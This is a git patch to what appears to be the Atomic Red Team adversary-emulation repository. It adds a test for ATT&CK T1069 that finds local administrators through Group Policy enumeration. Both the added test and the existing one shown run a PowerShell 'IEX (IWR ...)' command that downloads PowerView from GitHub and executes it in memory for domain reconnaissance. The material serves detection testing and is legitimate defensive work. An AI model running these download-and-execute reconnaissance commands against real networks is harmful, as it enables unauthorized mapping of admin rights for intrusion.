From e0eaff95eacde7dfdf8e0d7e260ad7f9e8ff7670 Mon Sep 17 00:00:00 2001 From: Andrew Beers Date: Thu, 21 May 2020 17:04:33 -0500 Subject: [PATCH] T1069 find local admins via group policy power view (#1006) * T1069 Find Local Admins via Group Policy (PowerView) * fix default param Co-authored-by: Carrie Roberts --- atomics/T1069/T1069.yaml | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/atomics/T1069/T1069.yaml b/atomics/T1069/T1069.yaml index 869f1062..8cc7a3ca 100644 --- a/atomics/T1069/T1069.yaml +++ b/atomics/T1069/T1069.yaml @@ -80,7 +80,6 @@ atomic_tests: auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1 description: | Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. - supported_platforms: - windows @@ -103,3 +102,22 @@ atomic_tests: elevation_required: false command: | IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin -Verbose + +- name: Find Local Admins via Group Policy (PowerView) + description: | + takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. + + supported_platforms: + - windows + + input_arguments: + computer_name: + description: hostname of the computer to analyze + type: Path + default: $env:COMPUTERNAME + + executor: + name: powershell + elevation_required: false + command: | + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose \ No newline at end of file